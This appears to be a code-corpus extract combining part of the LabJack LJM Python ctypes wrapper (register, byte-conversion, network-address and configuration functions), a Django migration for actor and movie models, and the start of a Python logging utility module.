with size of numFrames and filled with zeros.
aDataTypes: List of data types to pass. This should be at least
the size numFrames. Default is None, which creates this list
with size of numFrames and filled with zeros.
Returns:
A tuple containing:
(aAddresses, aDataTypes)
aAddresses: A list of addresses corresponding to the register
names list.
aDataTypes: A list of data types corresponding to the register
names list.
Raises:
TypeError: names is not a list of strings.
LJMError: An error was returned from the LJM library call.
Note: For each register identifier in aNames that is invalid, the
corresponding aAddresses value will be set to
labjack.ljm.constants.INVALID_NAME_ADDRESS.
"""
cNumFrames = ctypes.c_int32(numFrames)
asciiNames = []
for x in aNames:
if not isinstance(x, str):
raise TypeError("Expected a string list but found an item " + str(type(x)) + ".")
asciiNames.append(x.encode("ascii"))
cNames = _convertListToCtypeArray(asciiNames, ctypes.c_char_p)
if aAddresses is None:
cAddrs = (ctypes.c_int32*numFrames)()
else:
cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
if aDataTypes is None:
cTypes = (ctypes.c_int32*numFrames)()
else:
cTypes = _convertListToCtypeArray(aDataTypes, ctypes.c_int32)
error = _staticLib.LJM_NamesToAddresses(cNumFrames, ctypes.byref(cNames), ctypes.byref(cAddrs), ctypes.byref(cTypes))
if error != errorcodes.NOERROR:
raise LJMError(error)
return _convertCtypeArrayToList(cAddrs), _convertCtypeArrayToList(cTypes)
def nameToAddress(name):
"""Takes a Modbus register name and returns the corresponding
address and data type values.
Args:
name: Register name string.
Returns:
A tuple containing:
(address, dataType)
address: Address value corresponding to the register name.
dataType: Data type value corresponding to the register names.
Raises:
TypeError: name is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(name, str):
raise TypeError("Expected a string instead of " + str(type(name)) + ".")
cAddr = ctypes.c_int32(0)
cType = ctypes.c_int32(0)
error = _staticLib.LJM_NameToAddress(name.encode("ascii"), ctypes.byref(cAddr), ctypes.byref(cType))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cAddr.value, cType.value
def addressesToTypes(numAddresses, aAddresses):
"""Takes a list of Modbus register addresses and returns their data
types.
Args:
numAddresses: The number of addresses you want the data types
of.
address: A list of the Modbus register addresses you want the
data types of.
Returns:
A list of data types corresponding to the address list.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cNumAddrs = ctypes.c_int32(numAddresses)
cAddrs = _convertListToCtypeArray(aAddresses, ctypes.c_int32)
cTypes = (ctypes.c_int32*numAddresses)()
error = _staticLib.LJM_AddressesToTypes(cNumAddrs, ctypes.byref(cAddrs), ctypes.byref(cTypes))
if error != errorcodes.NOERROR:
raise LJMError(error)
return _convertCtypeArrayToList(cTypes)
def addressToType(address):
"""Takes a Modbus register address and returns its data type.
Args:
address: The Modbus register address you want the data type of.
Returns:
The data type of the address.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cAddr = ctypes.c_int32(address)
cType = ctypes.c_int32(0)
error = _staticLib.LJM_AddressToType(cAddr, ctypes.byref(cType))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cType.value
def lookupConstantValue(scope, constantName):
"""Takes a register name or other scope and a constant name, and
returns the constant value.
Args:
scope: The register name or other scope string to search within.
constantName: The name of the constant string to search for.
Returns:
The constant value from the given scope, if found.
Raises:
TypeError: scope or constantName is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(scope, str):
raise TypeError("Expected a string instead of " + str(type(scope)) + ".")
if not isinstance(constantName, str):
raise TypeError("Expected a string instead of " + str(type(constantName)) + ".")
cConstVal = ctypes.c_double(0)
error = _staticLib.LJM_LookupConstantValue(scope.encode("ascii"), constantName.encode("ascii"), ctypes.byref(cConstVal))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cConstVal.value
def lookupConstantName(scope, constantValue):
"""Takes a register name or other scope and a value, and returns the
name of that value.
Args:
scope: The register name or other scope string to search within.
constantName: The constant value integer to search for.
Returns:
The constant name from the given scope, if found.
Raises:
TypeError: scope is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(scope, str):
raise TypeError("Expected a string instead of " + str(type(scope)) + ".")
cConstVal = ctypes.c_double(constantValue)
cConstName = ("\0"*constants.MAX_NAME_SIZE).encode("ascii")
error = _staticLib.LJM_LookupConstantName(scope.encode("ascii"), cConstVal, cConstName)
if error != errorcodes.NOERROR:
raise LJMError(error)
return _decodeASCII(cConstName)
def errorToString(errorCode):
"""Returns the the name of an error code.
Args:
errorCode: The error code to look up.
Returns:
The error name string.
Note:
If the constants file that has been loaded does not contain
errorCode, this returns a message saying so. If the constants
file could not be opened, this returns a string saying so and
where that constants file was expected to be.
"""
cErr = ctypes.c_int32(errorCode)
errStr = ("\0"*constants.MAX_NAME_SIZE).encode("ascii")
_staticLib.LJM_ErrorToString(cErr, errStr)
return _decodeASCII(errStr)
def loadConstants():
"""Manually loads or reloads the constants files associated with
the errorToString and namesToAddresses functions.
Note:
This step is handled automatically. This function does not
need to be called before either errorToString or
namesToAddresses.
"""
_staticLib.LJM_LoadConstants()
def loadConstantsFromFile(fileName):
"""Loads the constants file from the given file name. Alias for
executing:
writeLibraryConfigStringS(labjack.ljm.constants.CONSTANTS_FILE,
fileName)
Args:
fileName: A file name string using relative or absolute path
to pass to writeLibraryConfigStringS.
Raises:
TypeError: filePath is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(fileName, str):
raise TypeError("Expected a string instead of " + str(type(fileName)) + ".")
error = _staticLib.LJM_LoadConstantsFromFile(fileName.encode("ascii"))
if error != errorcodes.NOERROR:
raise LJMError(error)
def loadConstantsFromString(jsonString):
"""Parses jsonString as the constants file and loads it.
Args:
jsonString: A JSON string containing a "registers" array and/or
an "errors" array.
Raises:
TypeError: jsonString is not a string.
LJMError: An error was returned from the LJM library call.
Note:
If the JSON string does not contain a "registers" array, the
Modbus-related constants are not affected. Similarly, if the
JSON string does not contain an "errors" array, the errorcode-
related constants are not affected.
"""
if not isinstance(jsonString, str):
raise TypeError("Expected a string instead of " + str(type(jsonString)) + ".")
error = _staticLib.LJM_LoadConstantsFromString(jsonString.encode("ascii"))
if error != errorcodes.NOERROR:
raise LJMError(error)
def tcVoltsToTemp(tcType, tcVolts, cjTempK):
"""Converts thermocouple voltage to a temperature.
Args:
tcType: The thermocouple type. See "Thermocouple Type constants"
in labjack.ljm.constants (ttX).
tcVolts: The voltage reported by the thermocouple.
cjTempK: The cold junction temperature in degrees Kelvin.
Returns:
The calculated temperature in degrees Kelvin.
Raises:
LJMError: An error was returned from the LJM library call.
Note:
B-type measurements below ~373 degrees Kelvin or ~0.04
millivolts (at a cold junction junction temperature of 273.15
degrees Kelvin) may be inaccurate.
"""
cTCType = ctypes.c_int32(tcType)
cTCVolts = ctypes.c_double(tcVolts)
cCJTempK = ctypes.c_double(cjTempK)
cTCTempK = ctypes.c_double(0)
error = _staticLib.LJM_TCVoltsToTemp(cTCType, cTCVolts, cCJTempK, ctypes.byref(cTCTempK))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cTCTempK.value
def float32ToByteArray(aFLOAT32, registerOffset=0, numFLOAT32=None, aBytes=None):
"""Converts a list of values from 32-bit floats to bytes
(big-endian).
Args:
aFLOAT32: The list of 32-bit float values to be converted.
registerOffset: The register offset to put the converted values
in aBytes. Default is 0.
numFLOAT32: The number of values to convert. Default is None
and will be set to the list length of aFLOAT32.
aBytes: Byte list to pass. It should be at least
registerOffset*2 + numFLOAT32*4 in size. Default is None,
which creates a list of the correct size filled with zeros.
Returns:
A list of converted values in byte form.
"""
cFloats = _convertListToCtypeArray(aFLOAT32, ctypes.c_float)
cRegOffset = ctypes.c_int32(registerOffset)
if numFLOAT32 is None:
numFLOAT32 = len(cFloats)
cNumFloat = ctypes.c_int32(numFLOAT32)
numBytes = numFLOAT32*4 + registerOffset*2
if aBytes is None:
aBytes = [0]*numBytes
cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
_staticLib.LJM_FLOAT32ToByteArray(ctypes.byref(cFloats), cRegOffset, cNumFloat, ctypes.byref(cUbytes))
return _convertCtypeArrayToList(cUbytes)
def byteArrayToFLOAT32(aBytes, registerOffset=0, numFLOAT32=None, aFLOAT32=None):
"""Converts a list of values from bytes (big-endian) to 32-bit
floats.
Args:
aBytes: The bytes to be converted.
registerOffset: The register offset to get the values from in
aBytes. Default is 0.
numFLOAT32: The number of 32-bit float values to convert.
Default is None, and will be the length of the aBytes list
divided by 4.
aFLOAT32: Float list to pass. It should be at least numFLOAT32
in size. Default is None, which creates a list of the
correct size filled with zeros.
Returns:
A list of converted values in float form.
"""
cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
cRegOffset = ctypes.c_int32(registerOffset)
maxNum = int((len(cUbytes)-registerOffset*2)/4)
if numFLOAT32 is None:
numFLOAT32 = maxNum
cNumFloat = ctypes.c_int32(numFLOAT32)
if aFLOAT32 is None:
aFLOAT32 = [0]*numFLOAT32
cFloats = _convertListToCtypeArray(aFLOAT32, ctypes.c_float)
_staticLib.LJM_ByteArrayToFLOAT32(ctypes.byref(cUbytes), cRegOffset, cNumFloat, ctypes.byref(cFloats))
return _convertCtypeArrayToList(cFloats)
def uint16ToByteArray(aUINT16, registerOffset=0, numUINT16=None, aBytes=None):
"""Converts a list of values from 16-bit unsigned integers to bytes
(big-endian).
Args:
aUINT16: The list of 16-bit unsigned integer values to be
converted.
registerOffset: The register offset to put the converted values
in aBytes. Default is 0.
numUINT16: The number of values to convert. Default is None
and will be set to the list length of aUINT16.
aBytes: Byte list to pass. It should be at least
registerOffset*2 + numUINT16*2 in size. Default is None,
which creates a list of the correct size filled with zeros.
Returns:
A list of converted values in byte form.
"""
cUint16s = _convertListToCtypeArray(aUINT16, ctypes.c_uint16)
cRegOffset = ctypes.c_int32(registerOffset)
if numUINT16 is None:
numUINT16 = len(cUint16s)
cNumUint16 = ctypes.c_int32(numUINT16)
numBytes = numUINT16*2 + registerOffset*2
if aBytes is None:
aBytes = [0]*numBytes
cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
_staticLib.LJM_UINT16ToByteArray(ctypes.byref(cUint16s), cRegOffset, cNumUint16, ctypes.byref(cUbytes))
return _convertCtypeArrayToList(cUbytes)
def byteArrayToUINT16(aBytes, registerOffset=0, numUINT16=None, aUINT16=None):
"""Converts a list of values from bytes (big-endian) to 16-bit
unsigned integers.
Args:
aBytes: The bytes to be converted.
registerOffset: The register offset to get the values from in
aBytes. Default is 0.
numUINT16: The number of 16-bit unsigned integer values to
convert. Default is None, and will be the length of the
aBytes list divided by 2.
aUINT16: 16-bit unsigned integer list to pass. It should be
at least numUINT16 in size. Default is None, which
creates a list of the correct size filled with zeros.
Returns:
A list of converted values in 16-bit unsigned integer form.
"""
cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
cRegOffset = ctypes.c_int32(registerOffset)
maxNum = int((len(cUbytes)-registerOffset*2)/2)
if numUINT16 is None:
numUINT16 = maxNum
cNumUint16 = ctypes.c_int32(numUINT16)
if aUINT16 is None:
aUINT16 = [0]*numUINT16
cUint16s = _convertListToCtypeArray(aUINT16, ctypes.c_uint16)
_staticLib.LJM_ByteArrayToUINT16(ctypes.byref(cUbytes), cRegOffset, cNumUint16, ctypes.byref(cUint16s))
return _convertCtypeArrayToList(cUint16s)
def uint32ToByteArray(aUINT32, registerOffset=0, numUINT32=None, aBytes=None):
"""Converts a list of values from 32-bit unsigned integers to bytes
(big-endian).
Args:
aUINT32: The list of 32-bit unsigned integer values to be
converted.
registerOffset: The register offset to put the converted values
in aBytes. Default is 0.
numUINT32: The number of values to convert. Default is None
and will be set to the list length of aUINT32.
aBytes: Byte list to pass. It should be at least
registerOffset*2 + numUINT32*4 in size. Default is None,
which creates a list of the correct size filled with
zeros.
Returns:
A list of converted values in byte form.
"""
cUint32s = _convertListToCtypeArray(aUINT32, ctypes.c_uint32)
cRegOffset = ctypes.c_int32(registerOffset)
if numUINT32 is None:
numUINT32 = len(cUint32s)
cNumUint32 = ctypes.c_int32(numUINT32)
numBytes = numUINT32*4 + registerOffset*2
if aBytes is None:
aBytes = [0]*numBytes
cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
_staticLib.LJM_UINT32ToByteArray(ctypes.byref(cUint32s), cRegOffset, cNumUint32, ctypes.byref(cUbytes))
return _convertCtypeArrayToList(cUbytes)
def byteArrayToUINT32(aBytes, registerOffset=0, numUINT32=None, aUINT32=None):
"""Converts a list of values from bytes (big-endian) to 32-bit
unsigned integers.
Args:
aBytes: The bytes to be converted.
registerOffset: The register offset to get the values from in
aBytes. Default is 0.
numUINT32: The number of 32-bit unsigned integer values to
convert. Default is None, and will be the length of the
aBytes list divided by 4.
aUINT32: 32-bit unsigned integer list to pass. It should be
at least numUINT32 in size. Default is None, which
creates a list of the correct size filled with zeros.
Returns:
A List of converted values in 32-bit unsigned integer
form.
"""
cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
cRegOffset = ctypes.c_int32(registerOffset)
maxNum = int((len(cUbytes)-registerOffset*2)/4)
if numUINT32 is None:
numUINT32 = maxNum
cNumUint32 = ctypes.c_int32(numUINT32)
if aUINT32 is None:
aUINT32 = [0]*numUINT32
cUint32s = _convertListToCtypeArray(aUINT32, ctypes.c_uint32)
_staticLib.LJM_ByteArrayToUINT32(ctypes.byref(cUbytes), cRegOffset, cNumUint32, ctypes.byref(cUint32s))
return _convertCtypeArrayToList(cUint32s)
def int32ToByteArray(aINT32, registerOffset=0, numINT32=None, aBytes=None):
"""Converts a list of values from 32-bit signed integers to bytes
(big-endian).
Args:
aINT32: The list of 32-bit signed integer values to be
converted.
registerOffset: The register offset to put the converted values
in aBytes. Default is 0.
numINT32: The number of values to convert. Default is None and
will be set to the list length of aINT32.
aBytes: Byte list to pass. It should be at least
registerOffset*2 + numINT32*4 in size. Default is None,
which creates a byte list of the correct size filled with
zeros.
Returns:
A list of converted values in byte form.
"""
cInt32s = _convertListToCtypeArray(aINT32, ctypes.c_int32)
cRegOffset = ctypes.c_int32(registerOffset)
if numINT32 is None:
numINT32 = len(cInt32s)
cNumInt32 = ctypes.c_int32(numINT32)
numBytes = numINT32*4 + registerOffset*2
if aBytes is None:
aBytes = [0]*numBytes
cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
_staticLib.LJM_INT32ToByteArray(ctypes.byref(cInt32s), cRegOffset, cNumInt32, ctypes.byref(cUbytes))
return _convertCtypeArrayToList(cUbytes)
def byteArrayToINT32(aBytes, registerOffset=0, numINT32=None, aINT32=None):
"""Converts a list of values from bytes (big-endian) to 32-bit
signed integers.
Args:
aBytes: The bytes to be converted.
registerOffset: The register offset to get the values from in
aBytes. Default is 0.
numINT32: The number of 32-bit signed integer values to convert.
Default is None, and will be the length of the aBytes list
divided by 4.
aINT32: 32-bit signed integer list to pass. It should be
at least numINT32 in size. Default is None, which
creates a list of the correct size filled with zeros.
Returns:
A List of converted values in 32-bit signed integer form.
"""
cUbytes = _convertListToCtypeArray(aBytes, ctypes.c_ubyte)
cRegOffset = ctypes.c_int32(registerOffset)
maxNum = int((len(cUbytes)-registerOffset*2)/4)
if numINT32 is None:
numINT32 = maxNum
cNumInt32 = ctypes.c_int32(numINT32)
if aINT32 is None:
aINT32 = [0]*numINT32
cInt32s = _convertListToCtypeArray(aINT32, ctypes.c_int32)
_staticLib.LJM_ByteArrayToINT32(ctypes.byref(cUbytes), cRegOffset, cNumInt32, ctypes.byref(cInt32s))
return _convertCtypeArrayToList(cInt32s)
def numberToIP(number):
"""Takes an integer representing an IPv4 address and returns the
corresponding decimal-dot IPv4 address as a string.
Args:
number: The numerical representation of an IP address to be
converted to a string representation.
Returns:
The converted string representation of the IP address.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cNum = ctypes.c_uint32(number)
ipv4String = ("\0"*constants.IPv4_STRING_SIZE).encode("ascii")
error = _staticLib.LJM_NumberToIP(cNum, ipv4String)
if error != errorcodes.NOERROR:
raise LJMError(error)
return _decodeASCII(ipv4String)
def ipToNumber(ipv4String):
"""Takes a decimal-dot IPv4 string representing an IPv4 address and
returns the corresponding integer version of the address.
Args:
ipv4String: The string representation of the IP address to be
converted to a numerical representation.
Returns:
The numerical representation of ipv4String.
Raises:
TypeError: ipv4String is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(ipv4String, str):
raise TypeError("Expected a string instead of " + str(type(ipv4String)) + ".")
if len(ipv4String) < constants.IPv4_STRING_SIZE:
ipv4String += "\0"*(constants.IPv4_STRING_SIZE-len(ipv4String))
cNum = ctypes.c_uint32(0)
error = _staticLib.LJM_IPToNumber(ipv4String.encode("ascii"), ctypes.byref(cNum))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cNum.value
def numberToMAC(number):
"""Takes an integer representing a MAC address and outputs the
corresponding hex-colon MAC address as a string.
Args:
number: The numerical representation of a MAC address to be
converted to a string representation.
Returns:
The string representation of the MAC address after the
completion of this function.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cNum = ctypes.c_uint64(number)
macString = ("\0"*constants.MAC_STRING_SIZE).encode("ascii")
_staticLib.LJM_NumberToMAC.argtypes = [ctypes.c_uint64, ctypes.c_char_p]
error = _staticLib.LJM_NumberToMAC(number, macString)
if error != errorcodes.NOERROR:
raise LJMError(error)
return _decodeASCII(macString)
def macToNumber(macString):
"""Takes a hex-colon string representing a MAC address and outputs
the corresponding integer version of the address.
Args:
macString: The string representation of the MAC address to be
converted to a numerical representation.
Returns:
The numerical representation of macString.
Raises:
TypeError: macString is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(macString, str):
raise TypeError("Expected a string instead of " + str(type(macString)) + ".")
if len(macString) < constants.MAC_STRING_SIZE:
macString += "\0"*(constants.MAC_STRING_SIZE-len(macString))
cNum = ctypes.c_uint64(0)
error = _staticLib.LJM_MACToNumber(macString.encode("ascii"), ctypes.byref(cNum))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cNum.value
def getHostTick():
"""Queries the host system's steady (monotonic) clock,
preferentially with high precision.
Returns:
The current clock tick in microseconds.
"""
_staticLib.LJM_GetHostTick.restype = ctypes.c_uint64
return _staticLib.LJM_GetHostTick()
def getHostTick32Bit():
"""Queries the host system's steady (monotonic) clock,
preferentially with high precision, but returns two 32-bit integers
for the 64-bit clock tick.
Returns:
A tuple containing:
(tickUpper, tickLower)
tickUpper: The upper (most significant) 32 bits of the clock
tick.
tickLower: The lower (least significant) 32 bits of the clock
tick.
"""
cUpper = ctypes.c_uint32(0)
cLower = ctypes.c_uint32(0)
_staticLib.LJM_GetHostTick32Bit(ctypes.byref(cUpper), ctypes.byref(cLower))
return cUpper.value, cLower.value
def startInterval(intervalHandle, microseconds):
"""Allocates memory for the given intervalHandle and begins a
reoccurring interval timer. This function does not wait.
Args:
intervalHandle: The user-generated interval identifier.
microseconds: The number of microseconds in the interval.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cIntervalHandle = ctypes.c_int32(intervalHandle)
cMicrosecs = ctypes.c_int32(microseconds)
error = _staticLib.LJM_StartInterval(cIntervalHandle, cMicrosecs)
if error != errorcodes.NOERROR:
raise LJMError(error)
def waitForNextInterval(intervalHandle):
"""Waits (blocks/sleeps) until the next interval occurs. If
intervals are skipped, this function still waits until the next
complete interval.
Args:
intervalHandle: The user-generated interval identifier.
Returns:
The number of skipped intervals.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cIntervalHandle = ctypes.c_int32(intervalHandle)
cSkipIntervals = ctypes.c_int32(0)
error = _staticLib.LJM_WaitForNextInterval(cIntervalHandle, ctypes.byref(cSkipIntervals))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cSkipIntervals.value
def cleanInterval(intervalHandle):
"""Cleans/deallocates memory for the given intervalHandle.
Args:
intervalHandle: The user-generated interval identifier.
Raises:
LJMError: An error was returned from the LJM library call.
"""
cIntervalHandle = ctypes.c_int32(intervalHandle)
error = _staticLib.LJM_CleanInterval(cIntervalHandle)
if error != errorcodes.NOERROR:
raise LJMError(error)
def writeLibraryConfigS(parameter, value):
"""Writes/sets a library configuration/setting.
Args:
parameter: Name of the configuration value you want to set.
Needs to be a string and is not case-sensitive.
value: The config value.
Raises:
TypeError: parameter is not a string.
LJMError: An error was returned from the LJM library call.
"""
if isinstance(parameter, str) is False:
raise TypeError("Expected a string instead of " + str(type(parameter)) + ".")
cVal = ctypes.c_double(value)
error = _staticLib.LJM_WriteLibraryConfigS(parameter.encode("ascii"), cVal)
if error != errorcodes.NOERROR:
raise LJMError(error)
def writeLibraryConfigStringS(parameter, string):
"""Writes/sets a library configuration/setting.
Args:
parameter: Name of the configuration value you want to set.
Needs to be a string and is not case-sensitive.
string: The config value string. Must not be of size greater
than labjack.ljm.constants.MAX_NAME_SIZE
Raises:
TypeError: parameter or string is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(parameter, str):
raise TypeError("Expected a string instead of " + str(type(parameter)) + ".")
if not isinstance(string, str):
raise TypeError("Expected a string instead of " + str(type(string)) + ".")
error = _staticLib.LJM_WriteLibraryConfigStringS(parameter.encode("ascii"), string.encode("ascii"))
if error != errorcodes.NOERROR:
raise LJMError(error)
def readLibraryConfigS(parameter):
"""Reads a configuration/setting value from the library.
Args:
parameter: Name of the configuration value you want to read.
Needs to be a string and is not case-sensitive.
Returns:
The read config value as a float.
Raises:
TypeError: parameter is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(parameter, str):
raise TypeError("Expected a string instead of " + str(type(parameter)) + ".")
cVal = ctypes.c_double(0)
error = _staticLib.LJM_ReadLibraryConfigS(parameter.encode("ascii"), ctypes.byref(cVal))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cVal.value
def readLibraryConfigStringS(parameter):
"""Reads a configuration/setting string from the library.
Args:
parameter: Name of the configuration value you want to read.
Needs to be a string and is not case-sensitive.
Returns:
The read config string.
Raises:
TypeError: parameter is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(parameter, str):
raise TypeError("Expected a string instead of " + str(type(parameter)) + ".")
outStr = ("\0"*constants.MAX_NAME_SIZE).encode("ascii")
error = _staticLib.LJM_ReadLibraryConfigStringS(parameter.encode("ascii"), outStr)
if error != errorcodes.NOERROR:
raise LJMError(error)
return _decodeASCII(outStr)
def loadConfigurationFile(fileName):
"""Reads a file in as the new LJM configurations.
Args:
fileName: A file name string using relative or absolute path.
"default" maps to the default configuration file
ljm_startup_config.json in the constants file location.
Raises:
TypeError: fileName is not a string.
LJMError: An error was returned from the LJM library call.
"""
if not isinstance(fileName, str):
raise TypeError("Expected a string instead of " + str(type(fileName)) + ".")
error = _staticLib.LJM_LoadConfigurationFile(fileName.encode("ascii"))
if error != errorcodes.NOERROR:
raise LJMError(error)
def getSpecificIPsInfo():
"""Get information about whether the specific IPs file was parsed
successfully.
Returns:
A tuple containing:
(infoHandle, info)
infoHandle: A handle to info that should be passed to cleanInfo
after info has been read.
info: A JSON string (allocated by LJM) describing the state of
of the specific IPs. Semantics:
{
"errorCode": Integer LJME_ error code. 0 indicates no
error.
"IPs": Array of strings - the presentation-format IPs.
"message": Human-readable string description of
success/failure.
"filePath": String absolute or relative file path.
"invalidIPs": Array of strings - the unparsable lines.
}
Raises:
LJMError: An error was returned from the LJM library call.
"""
cInfoHandle = ctypes.c_int32(0)
cInfo = ctypes.c_char_p()
error = _staticLib.LJM_GetSpecificIPsInfo(ctypes.byref(cInfoHandle), ctypes.byref(cInfo))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cInfoHandle.value, _decodeASCII(cInfo.value)
def getDeepSearchInfo():
"""Get information about whether the Deep Search file was parsed
successfully.
Returns:
A tuple containing:
(infoHandle, info)
infoHandle: A handle to Info that should be passed to cleanInfo
after info has been read.
info: A JSON string (allocated by LJM) describing the state of
state of the Deep Search IPs. Semantics:
{
"errorCode": Integer LJME_ error code. 0 indicates no
error.
"IPs": Array of strings - the presentation-format IPs.
"message": Human-readable string description of
success/failure.
"filePath": String absolute or relative file path.
"invalidIPs": Array of strings - the unparsable lines.
}
Raises:
LJMError: An error was returned from the LJM library call.
"""
cInfoHandle = ctypes.c_int32(0)
cInfo = ctypes.c_char_p()
error = _staticLib.LJM_GetDeepSearchInfo(ctypes.byref(cInfoHandle), ctypes.byref(cInfo))
if error != errorcodes.NOERROR:
raise LJMError(error)
return cInfoHandle.value, _decodeASCII(cInfo.value)
def log(level, string):
"""Sends a message of the specified level to the LJM debug logger.
Args:
level: The level to output the message at. See
labjack.ljm.constants.DEBUG_LOG_LEVEL.
string: The debug message to be written to the log file.
Raises:
TypeError: string parameter is not a string.
LJMError: An error was returned from the LJM library call.
Note: By default, DEBUG_LOG_MODE is to never log, so LJM does
not output any log messages, even from this function.
"""
cLev = ctypes.c_int32(level)
if not isinstance(string, str):
raise TypeError("Expected a string instead of " + str(type(string)) + ".")
error = _staticLib.LJM_Log(cLev, string.encode("ascii"))
if error != errorcodes.NOERROR:
raise LJMError(error)
def resetLog():
"""Clears all characters from the debug log file.
Raises:
LJMError: An error was returned from the LJM library call.
"""
error = _staticLib.LJM_ResetLog()
if error != errorcodes.NOERROR:
raise LJMError(error)
def registerDeviceReconnectCallback(handle, callback):
"""Sets a callback that is called by LJM after the device is found
to be disconnected (resulting in a read/write error) and the device
is then reconnected.
Args:
handle: A valid handle to an open device.
callback: The callback function which will receive the device
handle as a parameter.
Raises:
LJMError: An error was returned from the LJM library call.
Note: To disable the previous callback for reconnect, pass 0 or
None as the callback.
registerDeviceReconnectCallback may not be called from within a
callback.
"""
if callback is None or callback == 0:
cbLjm = 0
else:
cbData = _ReconnectCallbackData(handle, callback)
_g_reconnectCallbackData[handle] = cbData
cbLjm = cbData.callbackLjm
error = _staticLib.LJM_RegisterDeviceReconnectCallback(handle, cbLjm)
if error != errorcodes.NOERROR:
raise LJMError(error)
def _coerceToByteArrayIfString(aBytes):
"""If aBytes is a string, change it into a bytearray."""
if isinstance(aBytes, str):
aBytes = bytearray(aBytes, 'ascii')
return aBytes
def _convertListToCtypeArray(li, cType):
"""Returns a ctypes list converted from a normal list."""
return (cType*len(li))(*li)
def _convertCtypeArrayToList(listCtype):
"""Returns a normal list from a ctypes list."""
return listCtype[:]
def _decodeASCII(string):
"""Returns an ASCII decoded version of the null terminated string.
Non ASCII characters are ignored."""
return str(string.decode("ascii", "ignore").split("\0", 1)[0])
| 2.046875 | 2 |
demo/store/migrations/0001_initial.py | ikcam/django-boilerplate | 5 | 12765077 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-06-17 21:02
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Actor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=100)),
('last_name', models.CharField(max_length=100)),
('image', models.ImageField(blank=True, null=True, upload_to='actor/')),
],
options={
'ordering': ['last_name', 'first_name'],
'verbose_name': 'Actor',
'verbose_name_plural': 'Actors',
},
),
migrations.CreateModel(
name='Cast',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('description', models.TextField(blank=True)),
('image', models.ImageField(blank=True, null=True, upload_to='casts/')),
('actor', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Actor')),
],
options={
'ordering': ['name'],
'verbose_name': 'Cast',
'verbose_name_plural': 'Casts',
},
),
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('phone', models.CharField(max_length=30)),
('email', models.EmailField(max_length=254)),
('address', models.TextField(blank=True)),
('actor', models.OneToOneField(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='contact_information', to='store.Actor')),
],
),
migrations.CreateModel(
name='Movie',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=250)),
('year', models.PositiveIntegerField()),
('description', models.TextField()),
('image', models.ImageField(blank=True, null=True, upload_to='movies/')),
],
options={
'ordering': ['-year', 'name'],
'verbose_name': 'Movie',
'verbose_name_plural': 'Movies',
},
),
migrations.AddField(
model_name='cast',
name='movie',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='store.Movie'),
),
]
| 1.734375 | 2 |
pytools/lib/common.py | virtualparadox/bbmap | 134 | 12765078 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
"""
Function definitions common to all programs.
"""
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## libraries to use
#import re
import os
import time
import sys
#import getpass
import logging
#from colorlog import ColoredFormatter
# import EnvironmentModules # get_read_count_fastq
from subprocess import Popen, PIPE
from email.mime.text import MIMEText
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## function definitions
'''
creates a logging instance
https://docs.python.org/2/howto/logging.html
https://pypi.python.org/pypi/colorlog
'''
def get_logger(log_name, log_file, log_level = "INFO", stdout = False, color = False):
log = logging.getLogger(log_name)
handler = None
if stdout:
handler = logging.StreamHandler(sys.stdout)
else:
handler = logging.FileHandler(log_file)
formatter = logging.Formatter('%(filename)-15s:%(process)d %(asctime)s %(levelname)s: %(message)s')
if color and 1==2:
"""
